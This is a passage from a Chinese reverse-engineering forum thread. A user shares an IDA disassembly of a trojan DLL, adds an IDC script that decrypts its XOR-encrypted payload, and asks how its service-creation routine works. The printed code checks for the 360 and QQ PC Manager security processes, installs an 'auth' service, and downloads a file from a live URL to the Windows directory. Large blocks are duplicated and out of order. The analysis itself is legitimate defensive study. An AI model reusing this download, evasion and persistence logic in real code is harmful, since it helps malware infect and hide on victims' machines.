sub_10008B60 .text:100016FB add esp, 4 .text:100016FE push 1388h ; dwMilliseconds .text:10001703 call ds:Sleep .text:10001709 push 0 ; uExitCode .text:1000170B call ds:ExitProcess .text:1000170B DllEntryPoint endp .text:1000170B ////////////////////////////////////////////////////////////////////////////////////////////// 创建文件建立service 建立service的这一部分不是很懂，建立service的作用是什么的？ sub_10008B60 proc near ; CODE XREF: DllEntryPoint+AFp .text:10008B60 ; DllEntryPoint+1E6p .text:10008B60 .text:10008B60 arg_0 = dword ptr 8 .text:10008B60 .text:10008B60 push ebp .text:10008B61 mov ebp, esp .text:10008B63 mov eax, [ebp+arg_0] ; eax=0 .text:10008B66 push esi .text:10008B67 push eax .text:10008B68 call loc_100067F0 ; 释放文件 .text:10008B6D mov esi, eax .text:10008B6F add esp, 4 .text:10008B72 cmp esi, 0FFFFFFFFh .text:10008B75 jnz short loc_10008B87 .text:10008B77 push eax .text:10008B78 call loc_10006250 ; 建立service .text:10008B7D add esp, 4 .text:10008B80 nop .text:10008B81 nop .text:10008B82 xor al, al .text:10008B84 pop esi .text:10008B85 pop ebp .text:10008B86 retn .text:10008B87 ; --------------------------------------------------------------------------- .text:10008B87 .text:10008B87 loc_10008B87: ; CODE XREF: sub_10008B60+15j .text:10008B87 push esi .text:10008B88 call sub_10008900 .text:10008B8D push 0Ah .text:10008B8F call _Sleep .text:10008B94 push esi ; BytesReturned .text:10008B95 call sub_10006AE0 .text:10008B9A push esi .text:10008B9B call loc_100027A0 .text:10008BA0 push esi .text:10008BA1 call loc_10006250 .text:10008BA6 add esp, 14h .text:10008BA9 mov al, 1 .text:10008BAB pop esi .text:10008BAC pop ebp .text:10008BAD retn .text:10008BAD sub_10008B60 endp .text:10008BAD ///////////////////////////////////////////////////////////////////////// 文件解密 sub_10006110 proc near ; CODE XREF: sub_100065A0+17p .text:10006110 xor eax, eax .text:10006112 .text:10006112 loc_10006112: ; CODE XREF: sub_10006110+2Bj .text:10006112 mov ecx, eax .text:10006114 and ecx, 80000001h .text:1000611A jns short loc_10006121 ; 符号为正 .text:1000611C dec ecx .text:1000611D or ecx, 0FFFFFFFEh .text:10006120 inc ecx .text:10006121 .text:10006121 loc_10006121: ; CODE XREF: sub_10006110+Aj .text:10006121 mov dl, byte_1000D094[ecx] .text:10006127 mov cl, byte_10019EA4[eax] .text:1000612D xor cl, dl .text:1000612F mov byte_10019EA4[eax], cl .text:10006135 inc eax .text:10006136 cmp eax, 3040h .text:1000613B jl short loc_10006112 .text:1000613D xor eax, eax .text:1000613F retn .text:1000613F sub_10006110 endp 解密idc #include <idc.idc> static encrpty(mes,key,size) { auto i,x,y,eax,ecx; eax=0; for(i=0;i<size;i=i+1) { ecx=eax; ecx=ecx&0x80000001; if(ecx<=0)//不是jns符号为正 { ecx=ecx-1; ecx=ecx\|0x0FFFFFFFE; ecx=ecx+1; } x=Byte(mes+eax); y=Byte(key+ecx); x=x^y; PatchByte(mes+eax,x); eax=eax+1; Message("%d\n",eax); } } /////////////////////////////////////////////////////////////// 建立服务？？？求教 loc_10006140: ; CODE XREF: .text:100068B0p .text:10006140 push ebp .text:10006141 mov ebp, esp .text:10006143 sub esp, 104h .text:10006149 mov eax, dword_10019CE0 .text:1000614E mov ecx, dword_10019CE4 .text:10006154 mov edx, dword_10019CE8 .text:1000615A mov [ebp-104h], eax .text:10006160 mov al, byte_10019CEC .text:10006165 push ebx .text:10006166 push esi .text:10006167 push edi .text:10006168 mov [ebp-100h], ecx .text:1000616E mov [ebp-0F8h], al .text:10006174 mov ecx, 3Dh .text:10006179 xor eax, eax .text:1000617B lea edi, [ebp-0F7h] .text:10006181 mov [ebp-0FCh], edx .text:10006187 rep stosd .text:10006189 stosw .text:1000618B or ebx, 0FFFFFFFFh .text:1000618E stosb .text:1000618F jb short near ptr loc_10006193+1 .text:10006191 jnb short near ptr loc_10006193+1 .text:10006193 .text:10006193 loc_10006193: ; CODE XREF: .text:1000618Fj .text:10006193 ; .text:10006191j .text:10006193 call near ptr 106A6402h .text:10006198 push 0 .text:1000619A call _openSCManager .text:1000619F mov esi, eax .text:100061A1 add esp, 0Ch .text:100061A4 test esi, esi .text:100061A6 jz loc_1000623C .text:100061AC mov ecx, [ebp+8] .text:100061AF push 0 .text:100061B1 push 0 .text:100061B3 push 0 .text:100061B5 push 0 .text:100061B7 push 0 .text:100061B9 push ecx .text:100061BA push 0 .text:100061BC push 3 .text:100061BE push 1 .text:100061C0 push 10h .text:100061C2 push offset aAuth ; "auth" .text:100061C7 push offset aAuth ; "auth" .text:100061CC push esi .text:100061CD call sub_10002080 .text:100061D2 mov ebx, ds:GetLastError .text:100061D8 add esp, 34h .text:100061DB mov edi, eax .text:100061DD call ebx ; GetLastError .text:100061DF cmp eax, 431h .text:100061E4 jnz short loc_100061F8 .text:100061E6 push 10h .text:100061E8 push offset aAuth ; "auth" .text:100061ED push esi .text:100061EE call _openservice .text:100061F3 add esp, 0Ch .text:100061F6 mov edi, eax .text:100061F8 .text:100061F8 loc_100061F8: ; CODE XREF: .text:100061E4j .text:100061F8 push 0 .text:100061FA push 0 .text:100061FC push edi .text:100061FD call sub_10002250 .text:10006202 add esp, 0Ch .text:10006205 test eax, eax .text:10006207 jnz short loc_1000620B .text:10006209 call ebx ; GetLastError .text:1000620B .text:1000620B loc_1000620B: ; CODE XREF: .text:10006207j .text:1000620B push edi .text:1000620C call _closeservicehandle .text:10006211 push esi .text:10006212 call _closeservicehandle .text:10006217 push 0 .text:10006219 push 0 .text:1000621B push 3 .text:1000621D push 0 .text:1000621F push 0 .text:10006221 lea edx, [ebp-104h] .text:10006227 push 0C0000000h .text:1000622C push edx .text:1000622D call _createfile .text:10006232 add esp, 24h .text:10006235 pop edi .text:10006236 pop esi .text:10006237 pop ebx .text:10006238 mov esp, ebp .text:1000623A pop ebp .text:1000623B retn .text:1000623C ; --------------------------------------------------------------------------- .text:1000623C .text:1000623C loc_1000623C: ; CODE XREF: .text:100061A6j .text:1000623C pop edi .text:1000623D mov eax, ebx .text:1000623F pop esi .text:10006240 pop ebx .text:10006241 mov esp, ebp .text:10006243 pop ebp .text:10006244 retn .text:10006244 ; --------------------------------------------------------------------------- .text:10006245 align 10h ///////////////////////////////////////////////////////////////////////// urldownload部分 DWORD __stdcall loc_100011D0(LPVOID) .text:100011D0 loc_100011D0: ; DATA XREF: DllEntryPoint+C3o .text:100011D0 ; Simenze+12o .text:100011D0 push ebp .text:100011D1 mov ebp, esp .text:100011D3 sub esp, 32Ch .text:100011D9 push ebx .text:100011DA push esi .text:100011DB push edi .text:100011DC nop .text:100011DD nop .text:100011DE nop .text:100011DF nop .text:100011E0 nop .text:100011E1 nop .text:100011E2 jb short loc_100011E7 .text:100011E4 jnb short loc_100011E7 .text:100011E4 ; --------------------------------------------------------------------------- .text:100011E6 db 0E8h .text:100011E7 ; --------------------------------------------------------------------------- .text:100011E7 .text:100011E7 loc_100011E7: ; CODE XREF: .text:100011E2j .text:100011E7 ; .text:100011E4j .text:100011E7 mov esi, ds:LoadLibraryA .text:100011ED mov dword ptr [ebp-34h], 1 .text:100011F4 mov bl, 'i' .text:100011F6 .text:100011F6 loc_100011F6: ; CODE XREF: .text:10001427j .text:100011F6 push 9C40h .text:100011FB call _Sleep .text:10001200 mov ecx, 10h .text:10001205 xor eax, eax .text:10001207 lea edi, [ebp-77h] .text:1000120A mov byte ptr [ebp-98h], 'h' .text:10001211 mov byte ptr [ebp-97h], 't' .text:10001218 mov byte ptr [ebp-96h], 't' .text:1000121F mov byte ptr [ebp-95h], 'p' .text:10001226 mov byte ptr [ebp-94h], ':' .text:1000122D mov byte ptr [ebp-93h], '/' .text:10001234 mov byte ptr [ebp-92h], '/' .text:1000123B mov byte ptr [ebp-91h], 'c' .text:10001242 mov byte ptr [ebp-90h], '.' .text:10001249 mov byte ptr [ebp-8Fh], 's' .text:10001250 mov byte ptr [ebp-8Eh], 'h' .text:10001257 mov [ebp-8Dh], bl ; i .text:1000125D mov byte ptr [ebp-8Ch], 'd' .text:10001264 mov byte ptr [ebp-8Bh], 'a' .text:1000126B mov [ebp-8Ah], bl .text:10001271 mov byte ptr [ebp-89h], 'h' .text:10001278 mov byte ptr [ebp-88h], 'u' .text:1000127F mov byte ptr [ebp-87h], 'a' .text:10001286 mov byte ptr [ebp-86h], 'b' .text:1000128D mov [ebp-85h], bl .text:10001293 mov byte ptr [ebp-84h], 'a' .text:1000129A mov byte ptr [ebp-83h], 'n' .text:100012A1 mov byte ptr [ebp-82h], '.' .text:100012A8 mov byte ptr [ebp-81h], 'c' .text:100012AF mov byte ptr [ebp-80h], 'o' .text:100012B3 mov byte ptr [ebp-7Fh], 'm' .text:100012B7 mov byte ptr [ebp-7Eh], '/' .text:100012BB mov byte ptr [ebp-7Dh], 's' .text:100012BF mov byte ptr [ebp-7Ch], '.' .text:100012C3 mov byte ptr [ebp-7Bh], 'g' .text:100012C7 mov [ebp-7Ah], bl .text:100012CA mov byte ptr [ebp-79h], 'f' .text:100012CE mov byte ptr [ebp-78h], 0 ; http://c.shidaihuabian.com/s.gif .text:100012D2 rep stosd .text:100012D4 stosw .text:100012D6 stosb .text:100012D7 mov ecx, 40h .text:100012DC xor eax, eax .text:100012DE lea edi, [ebp-19Bh] .text:100012E4 mov byte ptr [ebp-19Ch], 0 .text:100012EB rep stosd .text:100012ED stosw .text:100012EF add esp, 4 .text:100012F2 mov byte ptr [ebp-1Ch], '\' .text:100012F6 stosb .text:100012F7 mov byte ptr [ebp-1Bh], 't' .text:100012FB mov byte ptr [ebp-1Ah], 'e' .text:100012FF mov byte ptr [ebp-19h], 'm' .text:10001303 mov byte ptr [ebp-18h], 'p' .text:10001307 mov byte ptr [ebp-17h], '\' .text:1000130B mov byte ptr [ebp-16h], 'o' .text:1000130F mov byte ptr [ebp-15h], 'l' .text:10001313 mov byte ptr [ebp-14h], 'm' .text:10001317 mov byte ptr [ebp-13h], '.' .text:1000131B mov [ebp-12h], bl ; i .text:1000131E mov byte ptr [ebp-11h], 'n' .text:10001322 mov [ebp-10h], bl .text:10001325 mov byte ptr [ebp-0Fh], 0 .text:10001329 nop .text:1000132A nop .text:1000132B nop .text:1000132C lea eax, [ebp-0Ch] .text:1000132F mov byte ptr [ebp-0Ch], 'u' .text:10001333 push eax .text:10001334 mov byte ptr [ebp-0Bh], 'r' .text:10001338 mov byte ptr [ebp-0Ah], 'l' .text:1000133C mov byte ptr [ebp-9], 'm' .text:10001340 mov byte ptr [ebp-8], 'o' .text:10001344 mov byte ptr [ebp-7], 'n' .text:10001348 mov byte ptr [ebp-6], '.' .text:1000134C mov byte ptr [ebp-5], 'd' .text:10001350 mov byte ptr [ebp-4], 'l' .text:10001354 mov byte ptr [ebp-3], 'l' .text:10001358 mov byte ptr [ebp-2], 0 .text:1000135C call esi ; loadlibrary 加载urlmon.dll .text:1000135E test eax, eax .text:10001360 jz loc_10001400 .text:10001366 lea ecx, [ebp-30h] .text:10001369 mov byte ptr [ebp-30h], 'U' .text:1000136D push ecx ; urlloadtofile .text:1000136E push eax ; urlmon.dll .text:1000136F mov byte ptr [ebp-2Fh], 'R' .text:10001373 mov byte ptr [ebp-2Eh], 'L' .text:10001377 mov byte ptr [ebp-2Dh], 'D' .text:1000137B mov byte ptr [ebp-2Ch], 'o' .text:1000137F mov byte ptr [ebp-2Bh], 'w' .text:10001383 mov byte ptr [ebp-2Ah], 'n' .text:10001387 mov byte ptr [ebp-29h], 'l' .text:1000138B mov byte ptr [ebp-28h], 'o' .text:1000138F mov byte ptr [ebp-27h], 'a' .text:10001393 mov byte ptr [ebp-26h], 'd' .text:10001397 mov byte ptr [ebp-25h], 'T' .text:1000139B mov byte ptr [ebp-24h], 'o' .text:1000139F mov byte ptr [ebp-23h], 'F' .text:100013A3 mov [ebp-22h], bl ; i .text:100013A6 mov byte ptr [ebp-21h], 'l' .text:100013AA mov byte ptr [ebp-20h], 'e' .text:100013AE mov byte ptr [ebp-1Fh], 'A' .text:100013B2 mov byte ptr [ebp-1Eh], 0 ; urlloadtofile .text:100013B6 call ds:GetProcAddress .text:100013BC lea edx, [ebp-19Ch] .text:100013C2 push 104h .text:100013C7 push edx .text:100013C8 mov _urlloadtofile, eax .text:100013CD call _getwindowsdirectory .text:100013D2 add esp, 8 .text:100013D5 lea eax, [ebp-1Ch] .text:100013D8 lea ecx, [ebp-19Ch] .text:100013DE push eax .text:100013DF push ecx .text:100013E0 call ds:lstrcatA .text:100013E6 push 0 .text:100013E8 lea edx, [ebp-19Ch] ; %system%+filename 储存为本地的文件名称 .text:100013EE push 0 .text:100013F0 lea eax, [ebp-98h] ; http:...url地址 .text:100013F6 push edx .text:100013F7 push eax .text:100013F8 push 0 .text:100013FA call _urlloadtofile .text:10001400 .text:10001400 loc_10001400: ; CODE XREF: .text:10001360j .text:10001400 lea ecx, [ebp-19Ch] .text:10001406 push ecx .text:10001407 call _getfileattributes .text:1000140C add esp, 4 .text:1000140F cmp eax, 0FFFFFFFFh .text:10001412 jnz short loc_1000143B .text:10001414 mov eax, [ebp-34h] .text:10001417 cmp eax, 0Ah .text:1000141A jz loc_100014F6 .text:10001420 inc eax .text:10001421 cmp eax, 1Eh .text:10001424 mov [ebp-34h], eax .text:10001427 jl loc_100011F6 .text:1000142D pop edi .text:1000142E pop esi .text:1000142F mov eax, 1 .text:10001434 pop ebx .text:10001435 mov esp, ebp .text:10001437 pop ebp .text:10001438 retn 4 .text:1000143B ; --------------------------------------------------------------------------- .text:1000143B 上传的附件：复件 12625750.rar （124.22kb，18次下载） 2012-8-26 14:37 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

麦小扣

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (6)
yuansunxue 雪币： 1024 活跃值： (240) 能力值： ( LV12，RANK：310 ) 在线值：发帖 26 回帖 267 粉丝 1 关注私信	yuansunxue 6 2 楼 lz加油可以把木马接受的命令分析下 2012-7-29 13:32 0
麦小扣雪币： 61 活跃值： (55) 能力值： ( LV3，RANK：20 ) 在线值：发帖 10 回帖 28 粉丝 0 关注私信	麦小扣 3 楼会继续努力的 2012-7-29 16:54 0
完美恶魔雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	完美恶魔 4 楼谢谢楼主的分享。真的非常不错zhutizhijia.net主题之家 2012-7-30 15:43 0
临冰结阵雪币： 32 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 20 粉丝 0 关注私信	临冰结阵 5 楼我靠···楼上是做广告的···· 2012-7-30 20:59 0
loongzyd 雪币： 1015 活跃值： (235) 能力值： ( LV12，RANK：440 ) 在线值：发帖 191 回帖 1111 粉丝 4 关注私信	loongzyd 10 6 楼感谢楼主的分享，将帖子移动至《病毒木马分析》板块 2012-7-31 17:45 0
麦小扣雪币： 61 活跃值： (55) 能力值： ( LV3，RANK：20 ) 在线值：发帖 10 回帖 28 粉丝 0 关注私信	麦小扣 7 楼 dll部分这里面的建立service部分没搞明白，以前没有接触过不知道起到什么作用的求教啊。。。功能分析： 1.提升进程权限 2.判断dll运行环境 3.释放文件，创建服务（这几个api以前没见过还没搞懂） 4.创建线程，下载文件（url： http://c.shidaihuabian.com/s.gif）部分反汇编代码： Dll入口 DllEntryPoint proc near .text:10001510 .text:10001510 dllpath = byte ptr -140h .text:10001510 var_3C = byte ptr -3Ch .text:10001510 var_3B = byte ptr -3Bh .text:10001510 var_3A = byte ptr -3Ah .text:10001510 var_39 = byte ptr -39h .text:10001510 var_38 = byte ptr -38h .text:10001510 var_37 = byte ptr -37h .text:10001510 var_36 = byte ptr -36h .text:10001510 var_35 = byte ptr -35h .text:10001510 var_34 = byte ptr -34h .text:10001510 var_33 = byte ptr -33h .text:10001510 var_32 = byte ptr -32h .text:10001510 var_31 = byte ptr -31h .text:10001510 var_30 = byte ptr -30h .text:10001510 var_2F = byte ptr -2Fh .text:10001510 var_2E = byte ptr -2Eh .text:10001510 SubStr = byte ptr -2Ch .text:10001510 var_2B = byte ptr -2Bh .text:10001510 var_2A = byte ptr -2Ah .text:10001510 var_29 = byte ptr -29h .text:10001510 var_28 = byte ptr -28h .text:10001510 var_27 = byte ptr -27h .text:10001510 var_26 = byte ptr -26h .text:10001510 var_25 = byte ptr -25h .text:10001510 var_24 = byte ptr -24h .text:10001510 var_23 = byte ptr -23h .text:10001510 var_22 = byte ptr -22h .text:10001510 var_21 = byte ptr -21h .text:10001510 var_20 = byte ptr -20h .text:10001510 var_1C = byte ptr -1Ch .text:10001510 var_1B = byte ptr -1Bh .text:10001510 var_1A = byte ptr -1Ah .text:10001510 var_19 = byte ptr -19h .text:10001510 var_18 = byte ptr -18h .text:10001510 var_17 = byte ptr -17h .text:10001510 var_16 = byte ptr -16h .text:10001510 var_15 = byte ptr -15h .text:10001510 var_14 = byte ptr -14h .text:10001510 var_13 = byte ptr -13h .text:10001510 var_12 = byte ptr -12h .text:10001510 var_11 = byte ptr -11h .text:10001510 var_10 = byte ptr -10h .text:10001510 var_C = byte ptr -0Ch .text:10001510 var_B = byte ptr -0Bh .text:10001510 var_A = byte ptr -0Ah .text:10001510 var_9 = byte ptr -9 .text:10001510 var_8 = byte ptr -8 .text:10001510 var_7 = byte ptr -7 .text:10001510 var_6 = byte ptr -6 .text:10001510 var_5 = byte ptr -5 .text:10001510 var_4 = byte ptr -4 .text:10001510 var_3 = byte ptr -3 .text:10001510 var_2 = byte ptr -2 .text:10001510 var_1 = byte ptr -1 .text:10001510 hinstDLL = dword ptr 8 .text:10001510 fdwReason = dword ptr 0Ch .text:10001510 lpReserved = dword ptr 10h .text:10001510 .text:10001510 push ebp .text:10001511 mov ebp, esp .text:10001513 sub esp, 140h .text:10001519 mov eax, [ebp+fdwReason] .text:1000151C dec eax .text:1000151D jnz loc_100016E9 .text:10001523 push ebx .text:10001524 push 1 提升进程权限 .text:10001526 call _rtladjustprivilege ; 判断dll运行环境 .text:1000152B mov bl, 'e' .text:1000152D mov [ebp+var_2B], 'x' .text:10001531 mov [ebp+SubStr], bl .text:10001534 mov [ebp+var_2A], 'p' .text:10001538 mov [ebp+var_29], 'l' .text:1000153C mov [ebp+var_28], 'o' .text:10001540 mov [ebp+var_27], 'r' .text:10001544 mov [ebp+var_26], bl .text:10001547 mov [ebp+var_25], 'r' .text:1000154B mov [ebp+var_24], '.' .text:1000154F mov [ebp+var_23], bl .text:10001552 mov [ebp+var_22], 78h .text:10001556 mov [ebp+var_21], bl .text:10001559 mov [ebp+var_20], 0 ; explorer.exe .text:1000155D nop .text:1000155E nop .text:1000155F nop .text:10001560 nop .text:10001561 mov eax, [ebp+hinstDLL] .text:10001564 push 104h .text:10001569 push offset _modulepath .text:1000156E push eax .text:1000156F call _getmodulefilename ; dll的路径 .text:10001574 add esp, 10h .text:10001577 push offset _modulepath ; lpString2 .text:1000157C push offset _modulepathcopy ; lpString1 .text:10001581 call ds:lstrcpyA .text:10001587 lea ecx, [ebp+dllpath] .text:1000158D push 104h ; nSize .text:10001592 push ecx ; lpFilename .text:10001593 push 0 ; hModule .text:10001595 call ds:GetModuleFileNameA ; 调用dll的路径 .text:1000159B lea edx, [ebp+SubStr] .text:1000159E lea eax, [ebp+dllpath] .text:100015A4 push edx ; SubStr .text:100015A5 push eax ; Str .text:100015A6 call _strlwr .text:100015AB add esp, 4 .text:100015AE push eax ; Str .text:100015AF call strstr .text:100015B4 add esp, 8 .text:100015B7 test eax, eax .text:100015B9 jz short loc_100015F0 ; 如果调用dll的不是explorer.exe跳转 .text:100015BB push esi .text:100015BC nop .text:100015BD push 0 释放文件创建服务 .text:100015BF call sub_10008B60 ; .text:100015C4 add esp, 4 创建线程下载url文件 .text:100015C7 mov esi, ds:CreateThread ; .text:100015CD push 0 ; lpThreadId .text:100015CF push 0 ; dwCreationFlags .text:100015D1 push 0 ; lpParameter .text:100015D3 push offset loc_100011D0 ; lpStartAddress .text:100015D8 push 0 ; dwStackSize .text:100015DA push 0 ; lpThreadAttributes .text:100015DC call esi ; CreateThread .text:100015DE push 0 ; lpThreadId .text:100015E0 push 0 ; dwCreationFlags .text:100015E2 push 0 ; lpParameter .text:100015E4 push offset StartAddress ; lpStartAddress .text:100015E9 push 0 ; dwStackSize .text:100015EB push 0 ; lpThreadAttributes .text:100015ED call esi ; CreateThread .text:100015EF pop esi .text:100015F0 .text:100015F0 loc_100015F0: ; CODE XREF: DllEntryPoint+A9j .text:100015F0 mov cl, 'a' ; 判断是否在安全软件中运行 .text:100015F2 mov dl, '0' .text:100015F4 mov [ebp+var_37], cl .text:100015F7 mov [ebp+var_17], cl .text:100015FA mov [ebp+var_3A], dl .text:100015FD mov [ebp+var_1A], dl .text:10001600 lea ecx, [ebp+var_3C] .text:10001603 lea edx, [ebp+dllpath] .text:10001609 mov al, 'q' .text:1000160B push ecx ; SubStr .text:1000160C push edx ; Str .text:1000160D mov [ebp+var_3C], '3' .text:10001611 mov [ebp+var_3B], '6' .text:10001615 mov [ebp+var_39], 'r' .text:10001619 mov [ebp+var_38], bl .text:1000161C mov [ebp+var_36], 'l' .text:10001620 mov [ebp+var_35], 'p' .text:10001624 mov [ebp+var_34], 'r' .text:10001628 mov [ebp+var_33], 'o' .text:1000162C mov [ebp+var_32], '.' .text:10001630 mov [ebp+var_31], bl .text:10001633 mov [ebp+var_30], 78h .text:10001637 mov [ebp+var_2F], bl .text:1000163A mov [ebp+var_2E], 0 ; 360realpro.exe .text:1000163E mov [ebp+var_C], al .text:10001641 mov [ebp+var_B], al .text:10001644 mov [ebp+var_A], 'p' .text:10001648 mov [ebp+var_9], 'c' .text:1000164C mov [ebp+var_8], 'm' .text:10001650 mov [ebp+var_7], 'g' .text:10001654 mov [ebp+var_6], 'r' .text:10001658 mov [ebp+var_5], '.' .text:1000165C mov [ebp+var_4], bl .text:1000165F mov [ebp+var_3], 78h .text:10001663 mov [ebp+var_2], bl .text:10001666 mov [ebp+var_1], 0 ; qqpcmgr.exe qq电脑管家进程 .text:1000166A mov [ebp+var_1C], '3' .text:1000166E mov [ebp+var_1B], '6' .text:10001672 mov [ebp+var_19], al .text:10001675 mov [ebp+var_18], 'u' .text:10001679 mov [ebp+var_16], 'r' .text:1000167D mov [ebp+var_15], 't' .text:10001681 mov [ebp+var_14], '.' .text:10001685 mov [ebp+var_13], bl .text:10001688 mov [ebp+var_12], 'x' .text:1000168C mov [ebp+var_11], bl .text:1000168F mov [ebp+var_10], 0 ; 360urt.exe .text:10001693 call _strlwr .text:10001698 add esp, 4 .text:1000169B push eax ; Str .text:1000169C call strstr .text:100016A1 add esp, 8 .text:100016A4 test eax, eax .text:100016A6 pop ebx .text:100016A7 jnz short loc_100016F4 ; 在安全软件中运行 .text:100016A9 lea eax, [ebp+var_1C] .text:100016AC lea ecx, [ebp+dllpath] .text:100016B2 push eax ; SubStr .text:100016B3 push ecx ; Str .text:100016B4 call _strlwr .text:100016B9 add esp, 4 .text:100016BC push eax ; Str .text:100016BD call strstr .text:100016C2 add esp, 8 .text:100016C5 test eax, eax .text:100016C7 jnz short loc_100016F4 ; 在安全软件中运行 .text:100016C9 lea edx, [ebp+var_C] .text:100016CC lea eax, [ebp+dllpath] .text:100016D2 push edx ; SubStr .text:100016D3 push eax ; Str .text:100016D4 call _strlwr .text:100016D9 add esp, 4 .text:100016DC push eax ; Str .text:100016DD call strstr .text:100016E2 add esp, 8 .text:100016E5 test eax, eax .text:100016E7 jnz short loc_100016F4 ; 在安全软件中运行 .text:100016E9 .text:100016E9 loc_100016E9: ; CODE XREF: DllEntryPoint+Dj .text:100016E9 mov eax, 1 .text:100016EE mov esp, ebp .text:100016F0 pop ebp .text:100016F1 retn 0Ch .text:100016F4 ; --------------------------------------------------------------------------- .text:100016F4 .text:100016F4 loc_100016F4: ; CODE XREF: DllEntryPoint+197j .text:100016F4 ; DllEntryPoint+1B7j ... .text:100016F4 push 0 ; 在安全软件中运行 .text:100016F6 call sub_10008B60 .text:100016FB add esp, 4 .text:100016FE push 1388h ; dwMilliseconds .text:10001703 call ds:Sleep .text:10001709 push 0 ; uExitCode .text:1000170B call ds:ExitProcess .text:1000170B DllEntryPoint endp .text:1000170B ////////////////////////////////////////////////////////////////////////////////////////////// 创建文件建立service 建立service的这一部分不是很懂，建立service的作用是什么的？ sub_10008B60 proc near ; CODE XREF: DllEntryPoint+AFp .text:10008B60 ; DllEntryPoint+1E6p .text:10008B60 .text:10008B60 arg_0 = dword ptr 8 .text:10008B60 .text:10008B60 push ebp .text:10008B61 mov ebp, esp .text:10008B63 mov eax, [ebp+arg_0] ; eax=0 .text:10008B66 push esi .text:10008B67 push eax .text:10008B68 call loc_100067F0 ; 释放文件 .text:10008B6D mov esi, eax .text:10008B6F add esp, 4 .text:10008B72 cmp esi, 0FFFFFFFFh .text:10008B75 jnz short loc_10008B87 .text:10008B77 push eax .text:10008B78 call loc_10006250 ; 建立service .text:10008B7D add esp, 4 .text:10008B80 nop .text:10008B81 nop .text:10008B82 xor al, al .text:10008B84 pop esi .text:10008B85 pop ebp .text:10008B86 retn .text:10008B87 ; --------------------------------------------------------------------------- .text:10008B87 .text:10008B87 loc_10008B87: ; CODE XREF: sub_10008B60+15j .text:10008B87 push esi .text:10008B88 call sub_10008900 .text:10008B8D push 0Ah .text:10008B8F call _Sleep .text:10008B94 push esi ; BytesReturned .text:10008B95 call sub_10006AE0 .text:10008B9A push esi .text:10008B9B call loc_100027A0 .text:10008BA0 push esi .text:10008BA1 call loc_10006250 .text:10008BA6 add esp, 14h .text:10008BA9 mov al, 1 .text:10008BAB pop esi .text:10008BAC pop ebp .text:10008BAD retn .text:10008BAD sub_10008B60 endp .text:10008BAD ///////////////////////////////////////////////////////////////////////// 文件解密 sub_10006110 proc near ; CODE XREF: sub_100065A0+17p .text:10006110 xor eax, eax .text:10006112 .text:10006112 loc_10006112: ; CODE XREF: sub_10006110+2Bj .text:10006112 mov ecx, eax .text:10006114 and ecx, 80000001h .text:1000611A jns short loc_10006121 ; 符号为正 .text:1000611C dec ecx .text:1000611D or ecx, 0FFFFFFFEh .text:10006120 inc ecx .text:10006121 .text:10006121 loc_10006121: ; CODE XREF: sub_10006110+Aj .text:10006121 mov dl, byte_1000D094[ecx] .text:10006127 mov cl, byte_10019EA4[eax] .text:1000612D xor cl, dl .text:1000612F mov byte_10019EA4[eax], cl .text:10006135 inc eax .text:10006136 cmp eax, 3040h .text:1000613B jl short loc_10006112 .text:1000613D xor eax, eax .text:1000613F retn .text:1000613F sub_10006110 endp 解密idc #include <idc.idc> static encrpty(mes,key,size) { auto i,x,y,eax,ecx; eax=0; for(i=0;i<size;i=i+1) { ecx=eax; ecx=ecx&0x80000001; if(ecx<=0)//不是jns符号为正 { ecx=ecx-1; ecx=ecx\|0x0FFFFFFFE; ecx=ecx+1; } x=Byte(mes+eax); y=Byte(key+ecx); x=x^y; PatchByte(mes+eax,x); eax=eax+1; Message("%d\n",eax); } } /////////////////////////////////////////////////////////////// 建立服务？？？求教 loc_10006140: ; CODE XREF: .text:100068B0p .text:10006140 push ebp .text:10006141 mov ebp, esp .text:10006143 sub esp, 104h .text:10006149 mov eax, dword_10019CE0 .text:1000614E mov ecx, dword_10019CE4 .text:10006154 mov edx, dword_10019CE8 .text:1000615A mov [ebp-104h], eax .text:10006160 mov al, byte_10019CEC .text:10006165 push ebx .text:10006166 push esi .text:10006167 push edi .text:10006168 mov [ebp-100h], ecx .text:1000616E mov [ebp-0F8h], al .text:10006174 mov ecx, 3Dh .text:10006179 xor eax, eax .text:1000617B lea edi, [ebp-0F7h] .text:10006181 mov [ebp-0FCh], edx .text:10006187 rep stosd .text:10006189 stosw .text:1000618B or ebx, 0FFFFFFFFh .text:1000618E stosb .text:1000618F jb short near ptr loc_10006193+1 .text:10006191 jnb short near ptr loc_10006193+1 .text:10006193 .text:10006193 loc_10006193: ; CODE XREF: .text:1000618Fj .text:10006193 ; .text:10006191j .text:10006193 call near ptr 106A6402h .text:10006198 push 0 .text:1000619A call _openSCManager .text:1000619F mov esi, eax .text:100061A1 add esp, 0Ch .text:100061A4 test esi, esi .text:100061A6 jz loc_1000623C .text:100061AC mov ecx, [ebp+8] .text:100061AF push 0 .text:100061B1 push 0 .text:100061B3 push 0 .text:100061B5 push 0 .text:100061B7 push 0 .text:100061B9 push ecx .text:100061BA push 0 .text:100061BC push 3 .text:100061BE push 1 .text:100061C0 push 10h .text:100061C2 push offset aAuth ; "auth" .text:100061C7 push offset aAuth ; "auth" .text:100061CC push esi .text:100061CD call sub_10002080 .text:100061D2 mov ebx, ds:GetLastError .text:100061D8 add esp, 34h .text:100061DB mov edi, eax .text:100061DD call ebx ; GetLastError .text:100061DF cmp eax, 431h .text:100061E4 jnz short loc_100061F8 .text:100061E6 push 10h .text:100061E8 push offset aAuth ; "auth" .text:100061ED push esi .text:100061EE call _openservice .text:100061F3 add esp, 0Ch .text:100061F6 mov edi, eax .text:100061F8 .text:100061F8 loc_100061F8: ; CODE XREF: .text:100061E4j .text:100061F8 push 0 .text:100061FA push 0 .text:100061FC push edi .text:100061FD call sub_10002250 .text:10006202 add esp, 0Ch .text:10006205 test eax, eax .text:10006207 jnz short loc_1000620B .text:10006209 call ebx ; GetLastError .text:1000620B .text:1000620B loc_1000620B: ; CODE XREF: .text:10006207j .text:1000620B push edi .text:1000620C call _closeservicehandle .text:10006211 push esi .text:10006212 call _closeservicehandle .text:10006217 push 0 .text:10006219 push 0 .text:1000621B push 3 .text:1000621D push 0 .text:1000621F push 0 .text:10006221 lea edx, [ebp-104h] .text:10006227 push 0C0000000h .text:1000622C push edx .text:1000622D call _createfile .text:10006232 add esp, 24h 